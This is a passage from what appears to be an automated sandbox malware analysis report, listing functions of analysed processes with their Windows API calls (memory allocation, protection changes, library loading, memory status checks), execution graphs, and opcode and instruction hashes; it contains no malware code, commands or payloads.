                                                                                • Opcode Fuzzy Hash: 38c308545c429fcded1b7e8eac335a3e500444cdaa3cc4cd9e7f6290e6426f92
                                                                                • Instruction Fuzzy Hash: F32127B1C0065A9FCB14CFAAC5446EEFBB0EF48324F14816AD919A7344D778A945CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 05FDE031 Relevance: 1.6, APIs: 1, Instructions: 58libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 05FDE0A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2342518720.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_5fd0000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 912fda33189e856d73458c777fc6950f9c382b7a27a16ffc4ce05416ff5d0041
                                                                                • Instruction ID: 61e71be221c992508004a12d8aca959cd4bc6bc485e42992cff01749a05d43c1
                                                                                • Opcode Fuzzy Hash: 912fda33189e856d73458c777fc6950f9c382b7a27a16ffc4ce05416ff5d0041
                                                                                • Instruction Fuzzy Hash: 611117B6C003489FDB10DF9AD548ADEFBF9FB89310F14841AD519A7210C379A545CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 018D7268 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 018D72D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2330970059.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_18d0000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: DeleteFile
                                                                                • String ID:
                                                                                • API String ID: 4033686569-0
                                                                                • Opcode ID: 0c0d786f093e3589ff6e55de0f84219649e1f6077f351a8519945937a7265b58
                                                                                • Instruction ID: 35048065edbeeec6bfbeace3c5d51e3c0d7e8318774a00d055db1926dab064bd
                                                                                • Opcode Fuzzy Hash: 0c0d786f093e3589ff6e55de0f84219649e1f6077f351a8519945937a7265b58
                                                                                • Instruction Fuzzy Hash: 9F1136B1C006599BCB14DF9AC544AAEFBB4EF48320F10812AD919A7240D778AA44CFE5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0689CA54 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0689D6BA), ref: 0689D7A7
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2343876651.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_6890000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalMemoryStatus
                                                                                • String ID:
                                                                                • API String ID: 1890195054-0
                                                                                • Opcode ID: 48da755a5159201e88e2e8eadc4b8bee638a77ee3f55acb12d19bd3e7a9ee447
                                                                                • Instruction ID: 1274e1584781ca96494b9c7e36903251ebced4295c5c6c3f081aaccb4f08638e
                                                                                • Opcode Fuzzy Hash: 48da755a5159201e88e2e8eadc4b8bee638a77ee3f55acb12d19bd3e7a9ee447
                                                                                • Instruction Fuzzy Hash: F91100B1C006599BCB10DF9AC544BAEFBF4EF48320F14816AE918B7240D378A944CFE5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0689D738 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0689D6BA), ref: 0689D7A7
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2343876651.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_6890000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalMemoryStatus
                                                                                • String ID:
                                                                                • API String ID: 1890195054-0
                                                                                • Opcode ID: c8ceb66b1a36eb9ebb1df0ff1e3584ac5b20d78dc4f1a1ced117ca10698a84e1
                                                                                • Instruction ID: 2e517e3a3ff22fb669c7b20bf8b00420173068da5c1afd42752d48ddc1462b6f
                                                                                • Opcode Fuzzy Hash: c8ceb66b1a36eb9ebb1df0ff1e3584ac5b20d78dc4f1a1ced117ca10698a84e1
                                                                                • Instruction Fuzzy Hash: 651142B1C006599FCB10DFAAC544AEEFBF4BF48310F14812AD818A7240D378A944CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 05FDE038 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 05FDE0A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2342518720.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_5fd0000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 33793efdcd406ad998a9b5e2cca3c964364ca0eede7f403bfa78543d0a89de92
                                                                                • Instruction ID: cae45b6fa3835178084899d472709fb4da485dc95ac0a7ebe8ba3dcd256ac7b5
                                                                                • Opcode Fuzzy Hash: 33793efdcd406ad998a9b5e2cca3c964364ca0eede7f403bfa78543d0a89de92
                                                                                • Instruction Fuzzy Hash: 4611E2B6D002498FDB10DF9AC448A9EFBF9BB88310F14842AD519A7210C379A545CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 05FDCF90 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,05FDDBFC), ref: 05FDDE36
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2342518720.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_5fd0000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: 874ab78127bbcf61cf46db79b2b72cee3c2a3e0b70105b761e4d36f709d4f604
                                                                                • Instruction ID: f83da413231959570855c4cf2c8f63f70e71b2fa8155cf973aefd810f4194c20
                                                                                • Opcode Fuzzy Hash: 874ab78127bbcf61cf46db79b2b72cee3c2a3e0b70105b761e4d36f709d4f604
                                                                                • Instruction Fuzzy Hash: C21102B6C007498FCB10DF9AC444AAEFBF9EB89210F14841AD519B7610D379A545CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0183D044 Relevance: .1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2328950507.000000000183D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0183D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_183d000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 18f76afb07f417044631e6397698fd586491ccd59b7a7056235e3971ec8cf402
                                                                                • Instruction ID: d2ceff5337292d49d28502621ec69c3b3bad94310ab49663943b08c4d03d5f86
                                                                                • Opcode Fuzzy Hash: 18f76afb07f417044631e6397698fd586491ccd59b7a7056235e3971ec8cf402
                                                                                • Instruction Fuzzy Hash: 36216771104204DFCB11CF68C9D0B26FB65FBC4714F68CA6DE8098B352C73AD446CAA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0183D03F Relevance: .1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2328950507.000000000183D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0183D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_183d000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                • Instruction ID: dd032fcf99a77262122409b9f4f128bc41c7a01eb4b10e94dfd067004b00047a
                                                                                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                • Instruction Fuzzy Hash: B711DD75504284CFDB12CF54C9C4B15FFA2FB84314F28CAA9D8498B252C33AD54ACFA2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:7.1%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:38
                                                                                Total number of Limit Nodes:3
                                                                                execution_graph 7694 fa3ec0 7695 fa3ece 7694->7695 7696 fa3ed4 7695->7696 7702 fa455e 7695->7702 7705 fa686f 7695->7705 7709 fa6e0e 7695->7709 7712 fa4488 7695->7712 7715 fa4557 7695->7715 7719 fabad0 7702->7719 7708 fabad0 VirtualProtect 7705->7708 7706 fa688c 7707 fa45f1 7707->7705 7707->7706 7708->7707 7711 fabad0 VirtualProtect 7709->7711 7710 fa6e29 7711->7710 7727 fac850 7712->7727 7716 fa456a 7715->7716 7717 fa459b 7716->7717 7718 fabad0 VirtualProtect 7716->7718 7717->7717 7718->7717 7721 fabae3 7719->7721 7723 fabe98 7721->7723 7724 fabee0 VirtualProtect 7723->7724 7726 fa459b 7724->7726 7730 fac878 7727->7730 7732 fac88b 7730->7732 7734 fac928 7732->7734 7735 fac968 VirtualAlloc 7734->7735 7737 fa44a8 7735->7737 7738 ecd030 7739 ecd048 7738->7739 7740 ecd0a3 7739->7740 7742 fac2e0 7739->7742 7743 fac308 7742->7743 7746 fac610 7743->7746 7744 fac32f 7747 fac633 7746->7747 7748 fabad0 VirtualProtect 7747->7748 7750 fac6df 7747->7750 7749 fac6d3 7748->7749 7749->7744 7750->7744

                                                                                Executed Functions

                                                                                Function 00FABE98 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 855 fabe98-fabf19 VirtualProtect 858 fabf1b-fabf21 855->858 859 fabf22-fabf47 855->859 858->859
                                                                                APIs
                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00FABF0C
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2232195392.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_fa0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: 6cee14e91c50077723ea12486ed9fc7881bee344a97fc63ef131bd80bb07bd13
                                                                                • Instruction ID: 30f37140430c6b1280c55baf5d51c25f2c5636a492cd49309afba1b4c3099c2a
                                                                                • Opcode Fuzzy Hash: 6cee14e91c50077723ea12486ed9fc7881bee344a97fc63ef131bd80bb07bd13
                                                                                • Instruction Fuzzy Hash: AE1108B1D002099FCB10DFAAC845AEEFBF5FF48310F548419D419A7250C7799945CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00FAC928 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 863 fac928-fac9a0 VirtualAlloc 866 fac9a9-fac9ce 863->866 867 fac9a2-fac9a8 863->867 867->866
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00FAC993
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2232195392.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_fa0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: ebfa3973d1f41fd3ca9f8b51276568ee9a76c25e57ecdaa5a143264540229f44
                                                                                • Instruction ID: b51c10b717e080287219c2a89d85be30b1c4905ca254c15eb85253e71512905f
                                                                                • Opcode Fuzzy Hash: ebfa3973d1f41fd3ca9f8b51276568ee9a76c25e57ecdaa5a143264540229f44
                                                                                • Instruction Fuzzy Hash: D11126B58002088FDB10DFAAC845AEFBFF5EF49320F108419D519A7250CB79A541CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00ECD005 Relevance: .1, Instructions: 74COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 929 ecd005-ecd042 931 ecd048 929->931 932 ecd0d3-ecd0da 929->932 933 ecd04a-ecd056 931->933 932->933 934 ecd05c-ecd07e 933->934 935 ecd0df-ecd0e4 933->935 937 ecd0e9-ecd0fe 934->937 938 ecd080-ecd09f call fac2e0 934->938 935->934 942 ecd0b5-ecd0bd 937->942 941 ecd0a3-ecd0b3 938->941 941->942 943 ecd10b 941->943 944 ecd0bf-ecd0d0 942->944 945 ecd100-ecd109 942->945 945->944
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2231904674.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_ecd000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f2d5f903b5c58dc2433d5df3e23d6ebd89bf534e62d5e4c09bd7eed254bb4488
                                                                                • Instruction ID: d2c3be22a0b5d6ddbba827facf3b53659252f2396413f8606b59a4d1c932e32b
                                                                                • Opcode Fuzzy Hash: f2d5f903b5c58dc2433d5df3e23d6ebd89bf534e62d5e4c09bd7eed254bb4488
                                                                                • Instruction Fuzzy Hash: 5A214F7110D7C49FDB038F24D994B15BF75EB46214F1985EBD8848B2A7C33A981ACB62
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00ECD030 Relevance: .1, Instructions: 74COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 948 ecd030-ecd042 949 ecd048 948->949 950 ecd0d3-ecd0da 948->950 951 ecd04a-ecd056 949->951 950->951 952 ecd05c-ecd07e 951->952 953 ecd0df-ecd0e4 951->953 955 ecd0e9-ecd0fe 952->955 956 ecd080-ecd09f call fac2e0 952->956 953->952 960 ecd0b5-ecd0bd 955->960 959 ecd0a3-ecd0b3 956->959 959->960 961 ecd10b 959->961 962 ecd0bf-ecd0d0 960->962 963 ecd100-ecd109 960->963 963->962
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2231904674.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_ecd000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 02ce39b7ac709ae68fb613fbd170679023666a4107169e8d08c91e36bc6bc7fd
                                                                                • Instruction ID: a94c7d92f5c0b18ae8ca6d4a5f861057ca7dd2dbca1ec66f4b7825ea1151af2c
                                                                                • Opcode Fuzzy Hash: 02ce39b7ac709ae68fb613fbd170679023666a4107169e8d08c91e36bc6bc7fd
                                                                                • Instruction Fuzzy Hash: BD21FF715082049FCB15DF18DE85F26BFA6EB88314F24857DE9092A246C33BD807CAA2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 069C6B6D Relevance: .1, Instructions: 59COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 966 69c6b6d-69c6b80 967 69c6bf6-69c6c8e 966->967 968 69c6b82 966->968 974 69c6c9a-69c6cb6 967->974 968->967 977 69c6cbc-69c6cbf 974->977 978 69c0072-69c0078 974->978 977->978 979 69c007a-69c06fa 978->979 980 69c0081-69cdbaa 978->980 979->978 987 69c0700 979->987 987->978
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2239331816.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_69c0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 826e627b9d9d66ae9fc31816775cec43f6656f07ea3068385afd67b94afe3562
                                                                                • Instruction ID: cfc5d45c993dad5f8b4eda82d992702e92f734ac589a2844856266ececa1ccdd
                                                                                • Opcode Fuzzy Hash: 826e627b9d9d66ae9fc31816775cec43f6656f07ea3068385afd67b94afe3562
                                                                                • Instruction Fuzzy Hash: 4C211774A08228CFCB55CF68C984A99BBF5FF48314F1444E9E809AB355CB30AE82CF50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 069C1831 Relevance: .0, Instructions: 33COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2239331816.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_69c0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 298b7c13c8c5960cc7fe4a7f1a1731514b4ce744026cad00e35bf94bf522a4b4
                                                                                • Instruction ID: e3623bd3147af22179d4bfd620091f796f59e9b93698636ff879958543d951f3
                                                                                • Opcode Fuzzy Hash: 298b7c13c8c5960cc7fe4a7f1a1731514b4ce744026cad00e35bf94bf522a4b4
                                                                                • Instruction Fuzzy Hash: D501D734E18228CFDB54DF68D95579D77B2FB88310F0040AAE919A7341CB356E80CF51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 069C3BF4 Relevance: .0, Instructions: 28COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2239331816.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_69c0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b61ba3a8332e43d4148ee7766e03c6b690dc1a7ae0d0d3f3d6525a8c8665c4ef
                                                                                • Instruction ID: dbda6c3e9658a80b8ecf7e317e2dc0238274d0e4aa493b4ab0d2ef392c01bf96
                                                                                • Opcode Fuzzy Hash: b61ba3a8332e43d4148ee7766e03c6b690dc1a7ae0d0d3f3d6525a8c8665c4ef
                                                                                • Instruction Fuzzy Hash: 39F05E35A0111A8FE751EB58D9527997BB1EB85324F1010AD950DAB792EB304A92CB42
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 069C2AB6 Relevance: .0, Instructions: 26COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2239331816.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_69c0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e742c9893a7ad5823c4582b24c8dcf85aa7406f7880f7287551a685631b75d57
                                                                                • Instruction ID: ea4821ef3e5021853af81a5ceb155d9fa4e79511abf5c6098ef000215eed1c9c
                                                                                • Opcode Fuzzy Hash: e742c9893a7ad5823c4582b24c8dcf85aa7406f7880f7287551a685631b75d57
                                                                                • Instruction Fuzzy Hash: 5301E434A00229CFD754EF68D942A99B7F2FB48300F1081EAE559A7385CF305D80CFA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 069C4130 Relevance: .0, Instructions: 25COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2239331816.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_69c0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c6c40b9c74fcfc9159bbd965f022900f06440b37cbd7e240a68326e90adbfaf0
                                                                                • Instruction ID: ee90c49ecd859543572c6a8be3df864db72737faf71d4df15a2226a70939aab9
                                                                                • Opcode Fuzzy Hash: c6c40b9c74fcfc9159bbd965f022900f06440b37cbd7e240a68326e90adbfaf0
                                                                                • Instruction Fuzzy Hash: E2F0E774A151298FDB54EF68C956A9E77B6FB88300F1140EAE519A7345CB305E81CF10
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 069C2A8F Relevance: .0, Instructions: 24COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2239331816.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_69c0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9523caaf1ca7f7b7567be42ba009dd6b4488e15c131fd293d4e251fbde397b98
                                                                                • Instruction ID: f6c66f89a8c6764d57040424fb28c699ca60a0855a6044fd0ae9084370856f6f
                                                                                • Opcode Fuzzy Hash: 9523caaf1ca7f7b7567be42ba009dd6b4488e15c131fd293d4e251fbde397b98
                                                                                • Instruction Fuzzy Hash: 50F0A9B0A08148CFCB40EF9CC88069A7BF1BB08320F1642AAD548A7B41CA349D40CF82
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 069C0A95 Relevance: .0, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2239331816.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_69c0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e229aac3fa453874115fd02a674e871b76e1f72079795aa9270218d51ac1f23d
                                                                                • Instruction ID: 8e65c1ed6d267be90b8a2a45b152d320ac0ae9dda267189412f852144c5bbd95
                                                                                • Opcode Fuzzy Hash: e229aac3fa453874115fd02a674e871b76e1f72079795aa9270218d51ac1f23d
                                                                                • Instruction Fuzzy Hash: EAF0FEB4A05114CFD754DF58C941A9E77B6FB88301F1041D9E919F7355CA319D51CF50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 069C61E3 Relevance: .0, Instructions: 15COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2239331816.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_69c0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 680f652ccddbd19b48d90dc208140d6f470a6452d6de72623d4a4c22c99c96ac
                                                                                • Instruction ID: 696c09748b8c7169d199526e266c2dfe67a9370bc8df2ad54e3ec564a791c5b8
                                                                                • Opcode Fuzzy Hash: 680f652ccddbd19b48d90dc208140d6f470a6452d6de72623d4a4c22c99c96ac
                                                                                • Instruction Fuzzy Hash: 7FD0A7344042199FE340D688C955EC537A4E304330F024111A516B7681DA5D0C43C6E2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 069CF970 Relevance: .0, Instructions: 11COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.2239331816.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_69c0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                                • Instruction ID: 89f7625bcd3042e5662e2b0f59687678129b36ffb3fe7dec0c562e4284fda470
                                                                                • Opcode Fuzzy Hash: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                                • Instruction Fuzzy Hash: 05C04C753042085F9344DA9DD851C26F7E9DBD8614714C06DA90DC7351EA72FD13C694
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:10.3%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:34
                                                                                Total number of Limit Nodes:3
                                                                                execution_graph 25127 2eb0848 25129 2eb084e 25127->25129 25128 2eb091b 25129->25128 25131 2eb1380 25129->25131 25133 2eb1396 25131->25133 25132 2eb1490 25132->25129 25133->25132 25137 2eb7320 25133->25137 25144 2eb7208 25133->25144 25148 2eb71f9 25133->25148 25138 2eb732a 25137->25138 25140 2eb7344 25138->25140 25152 5dcc0e0 25138->25152 25158 5dcc0d1 25138->25158 25139 2eb738a 25139->25133 25140->25139 25164 5dcdfcf 25140->25164 25146 2eb721e 25144->25146 25145 2eb738a 25145->25133 25146->25145 25147 5dcdfcf 3 API calls 25146->25147 25147->25145 25150 2eb7208 25148->25150 25149 2eb738a 25149->25133 25150->25149 25151 5dcdfcf 3 API calls 25150->25151 25151->25149 25154 5dcc0f5 25152->25154 25153 5dcc30a 25153->25140 25154->25153 25155 5dcc738 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 25154->25155 25156 5dcc728 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 25154->25156 25157 5dcc710 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 25154->25157 25155->25154 25156->25154 25157->25154 25160 5dcc0e0 25158->25160 25159 5dcc30a 25159->25140 25160->25159 25161 5dcc710 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 25160->25161 25162 5dcc738 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 25160->25162 25163 5dcc728 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 25160->25163 25161->25160 25162->25160 25163->25160 25165 5dcdfda 25164->25165 25166 5dcc0e0 3 API calls 25165->25166 25167 5dcdfe1 25166->25167 25167->25139

                                                                                Executed Functions

                                                                                Function 02EB9D78 Relevance: 2.8, Instructions: 2839COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2eb0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d8c609310b190f23c6a339a6ba1efba21d2b2ac5f05630c0141bb0d157f0c71b
                                                                                • Instruction ID: ae7f9d5c7b373a6c11324945944e0cf7e872098ab479b438a803635548e1b086
                                                                                • Opcode Fuzzy Hash: d8c609310b190f23c6a339a6ba1efba21d2b2ac5f05630c0141bb0d157f0c71b
                                                                                • Instruction Fuzzy Hash: 6B63E931D10B1A8EDB11EF68C8546EAF7B1FF99300F11D69AE45867121EB70AAD4CF81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02EB41D8 Relevance: .3, Instructions: 281COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3212836746.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
